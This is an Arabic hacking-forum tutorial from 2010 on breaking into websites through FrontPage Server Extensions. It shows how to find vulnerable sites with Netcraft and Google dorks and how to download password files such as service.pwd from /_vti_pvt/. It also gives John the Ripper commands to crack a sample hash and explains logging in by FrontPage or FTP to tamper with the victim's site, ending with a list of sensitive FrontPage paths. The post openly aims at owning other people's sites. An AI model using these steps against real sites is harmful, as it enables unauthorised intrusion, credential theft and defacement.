منتديات ايجي هاك سكول

عزيزي الزائر / عزيزتي الزائرة يرجي التكرم بتسجبل الدخول اذا كنت عضو معنا
او التسجيل ان لم تكن عضو وترغب في الانضمام الي اسرة المنتدي
سنتشرف بتسجيلك
شكرا
ادارة المنتدي

برامج هكر / برامج نت / افلام / العاب / برامج مج33 ونيم بظ


    شرح ثغرة فرونت بيج كامل

    شاطر

    KING OF HACKER
    رئيس ومؤسس المنتدي
    رئيس ومؤسس المنتدي

    عدد المساهمات : 130
    تاريخ التسجيل : 21/08/2010

    شرح ثغرة فرونت بيج كامل

    مُساهمة  KING OF HACKER في الأحد أغسطس 29, 2010 3:37 pm


    السلام عليكم ورحمة الله وبركاته


    الكثير منكم يتسائل عن طريقة اختراق المواقع عن طريق ثغرة الفرونت بيج ويظنها صعبة
    لكنها من اسهل ما يمكن ، فقط عليك التركيز والانتباه واذا صعبت عليك شيء اسال لا تخاف ،حتى تتقن الطريقة وتصير محترف
    اتمنى ان يعجبكم الدرس ويحوز على رضاكم

    ما هو الفرونت بيج
    يعد فرونت بيج من أهم البرامج استخداماً في إنشاء صفحات الويب و اسهلها و اكثرها انتشارا لكن فية ثغره نقرتين لعرض الصورة في صفحة مستقلةه تمكنك من امتلاك موقع الضحيه

    _______________________________
    شرح الثغره :
    عند تنصيب برنامج فرونت بيج يقوم البرنامج باقامة فولدرات وهي :
    vti_pvt_/(اخطرهم)
    vti_txt_/
    vti_cnf_/
    vti_log_/
    vti_bin_/
    private_/

    ملاحظة:::--
    تنفذ الثغرة على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها
    ___________________________
    (( كيف تعلم ان موقع ما يدعم الفرونت بيج ))
    وذلك بعدة طرق ولن أذكر إلا الأسهل:
    1-)بالذهاب إلى موقع netcraft netcraft
    ستجد مربع على اليسار اكتب فيه اسم الموقع
    مثال:[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    واضغط انتر
    وبعد البحث راح نشوف النتيجة التالية:
    The site [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
    هنا يهمنا ثلاث اشياء:-
    1- الملقم وهو:
    apache 1.3.20
    2- ودعم فرونت بيج
    FrontPage/5.0.2.2510
    3- النظام وهو
    Linux
    ___________________
    2-)او عن طريق إضافة الجملة
    vti_inf.html_/
    بعد عنوان الموقع لنفرض أن الموقع:
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    نضيف الجملة ليصبح بهذه الطريقةhttp://www.arank.com/_vti_inf.html
    وبعدها اضغط Enter
    وراح يطلعلك في أول الصفحة هذه الكلمة
    Frontpage Configuration Information
    أي قد تم تثبيت مجلدات وبرامج الفرونت بيج (يعني ان الموقع يدعم الفرونت بيج)
    __________________
    3-)وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا باضافه
    vti_cnf_/
    بعد عنوان الموقع كهذا المثال:

    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    واضغط زر الفأرة الأيمن واختار
    source المصدر
    وابحث عن
    vti_generator:Programe
    حيث
    Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به

    _____________________
    كيف يتم تطبيق الثغره ؟؟
    الحين وبعد لما عرفنا ان الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟
    بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك
    يعني وعلى سبيل المثال ان الموقع التالي
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    يدعم fontpage
    طيب نذهب إلى ملف vti_pvt_
    يعني كذا
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:
    *****strator.pwd
    *****strators.pwd
    Service.pwd
    Users.pwd
    User.pwd
    Author.pwd
    ممكت ما تلاقيها بالضبط لكن شبيهة منها
    ____________________________
    ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
    username : passwd
    اسم المستخدم والباسوورد
    يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات
    طلعلي ملف service يحتوي على user / password
    وهذا مضمون الملف
    operator:hi9LHn9wAMuKM
    حيث اسم المستخدم : operator
    الباسوورد المشفرة هي:hi9LHn9wAMuKM
    ______________________________
    ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
    وهذا يتم ببرامج كثير

    =(Crack Jack)=
    =(John The Ripper)=
    راح نستخدم الأفضل والأكثر تداولا وهو John The Ripper
    ويمكن تنزيلة من هذا الموقع :
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    ^^^^^^^^^^^^^^^^^^^^^^^^^^
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    ^^^^^^^^^^^^^^^^^^^^^^^^^^
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    ^^^^^^^^^^^^^^^^^^^^^^^^^^
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    ^^^^^^^^^^^^^^^^^^^^^^^^^^
    او اي موقع تحب ان تنزل البرنامج منه .
    ____________________________
    كيف تفك التشفير بهذا البرنامج
    طريقة عمل البرنامج :
    بعد التحميل راح يكون اسم الملف المضغوط في جهازك
    john-16w
    فك ضغطه وبعدين راح ينشأ لك ملف اسمه
    john-16w
    حاول تغير اسمه إلى
    john
    بعدين تنقل الملف john إلى :c
    بعد كذا تروح تنسخ اليوسر والباسوورد من الموقع الي انت حصلت فيه على الباسوورد المشفر
    يعني نفرض اني حصلت على ملف الباسوورد وهذي هي:
    operator:hi9LHn9wAMuKM

    نحاول ننشأ ملف جديد داخل مجلد run الموجود في مجلد john
    واسم الملف passwd طبعا هو نصي عشان كذا راح يصير امتداده txt

    ننسخ الباسوورد واليوسر وكلمة فرونت بيج إلى ملف passwd.txt
    يعني ننسخ
    operator:hi9LHn9wAMuKM
    إلى passwd.txt بعد كذا روح للدوز
    واكتب ..cd
    إلين ماتطلع من المجلدات والملفات كلها وتروح للـc
    واكتب الامر
    cd john
    بعدين انتر ثم اكتب
    cd run واضغط على انتر
    وعاد ماباقي عليك الا الاوامر الخاصة بفك تشفير الباسوورد
    نكتب أوامر برنامج John The Ripperوهي
    john -i:all passd.txt
    يبحث لك عن جميع الأنواع والاحتمالات

    john -i:Alpha passwd.txt
    يبحث عن الأحرف الصغيرة

    john -i: Digits passwd.txt
    يبحث عن الأرقام

    john -i:single passwd.txt
    أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم

    وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى
    john.pot
    الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها
    _________________________________
    ملاحظة:
    قد يحتاج البرنامج لاسبوع حتى يتمكن من فك الشفرة (هذا اذا كان الباسوورد طويل)
    طيب وش الحل
    انا ماني فاضي اخلي الكمبيوتر شغال لاسبوع وش اسوي؟
    عندي الحل اضغط كنترول + شفت +سي او
    كنترول+سي
    ctrl+shift+c
    ctrl+c
    لكي توقف عمل البرنامج
    ____________________
    كيف اكمل ؟
    اكتب
    john -restore
    وهو يكمل من اخر شيء وقفت عنده
    ______________________
    كيف تستطيع كذلك ملاحظة سير البرنامج؟؟
    من خلال الضغط على اي زر في لوحة المفاتيح وسترى جميع التخمينات لكسر هذه الكلمات المشفرة
    _________________________-
    كيف تستطيع ايقاف البرنامج ؟؟
    من خلال الضغط على الزر (Ctrl) و(Shift) و(C)
    وللفائدة اذكرها للأخوان الذين لايعلمون أغلب البرامج التي تعمل على الدوس
    تستطيع الخروج منها بهذه الحركة
    ___________________________
    هل البرنامج لايعمل إلا على كسر هذا النوع من الملفات ؟؟
    لا بل يستطيع كسر اغلب كلمات السر التي تكون مشفرة لانه يستخدم شفرة (DES) وانواع اخرى
    حتى اني قرأت أخيراً ان البرنامج يقوم بكسر شفرة (md5) وانواع اخرى للفائدة اذكرها مثل (BSDI) تابع

    إنت ألحين مستريح عندك username والـpassword
    وش بقالك ؟!!
    يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
    (1-)
    frontpage
    بعدين
    file وتذهب إلى
    open web
    وتحط الموقع فتطلعلك الصفحة الرئيسية فير اللي بدك اياه بعدين
    save or publish
    بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
    sign

    - - - - - - - - - - - - - - - - - - -

    (2-)
    من FTP
    وعليك ببرامج الـFTP المنتشرة
    كالـws-ftp
    والـpro ftp
    والمزيد ...
    ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك

    ======================================

    وألحين أكيد تبون تجربون على مواقع بس ما تعرفون مواقع تدعم الفرونت بيج؟؟؟
    أقولكم روحوا google(4)
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    واكتبوا في إطار البحث
    vti_pvt_/
    وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة
    -----------------------------------
    وعندك محرك بحث
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    تكتب في محرك البحث
    link:service.pwd
    أو
    link:*****strators
    وغيرها من الملفات الاحتمال وجود password فيها

    وهذه ثغرات للفرونت بيج (غير المذكورة في الاعلى)
    /_private/form_results.txt
    /_private/form_results.htm
    /_private/register.htm
    /_vti_pvt/service.cnf
    /_vti_pvt/service.stp
    /_vti_pvt/services.cnf
    /_vti_pvt/svcacl.cnf
    /_vti_pvt/writeto.cnf
    /_vti_pvt/access.cnf
    /_vti_bin/_vti_aut/author.exe
    /_vti_bin/_vti_aut/author.dll
    /_vti_pvt/service.pwd
    /_vti_pvt/users.pwd
    /_vti_pvt/authors.pwd
    /_vti_pvt/*****istrators.pwd
    /_vti_bin/shtml.dll
    /_vti_bin/shtml.exe
    /_vti_bin
    /_vti_bin/_vti_adm
    /_vti_bin/_vti_aut
    /_vti_pvt/writeto.cnf
    /_vti_pvt/svcacl.cnf
    /_vti_pvt/services.cnf
    /_vti_pvt/service.stp
    /_vti_pvt/service.cnf
    /_vti_pvt/access.cnf
    /_private/registrations.txt
    /_vti_bin/_vti_aut/dvwssr.dll
    /_private/registrations.htm
    /_private/register.txt
    /_private/register.htm
    /_private/orders.txt
    /_private/orders.htm
    /_private/form_results.htm
    /_private/form_results.txt
    /_vti_bin/_vti_adm/*****.dll

    ونقرتين لعرض الصورة في صفحة مستقلة عليك الموقع ....

      الوقت/التاريخ الآن هو السبت ديسمبر 10, 2016 3:23 pm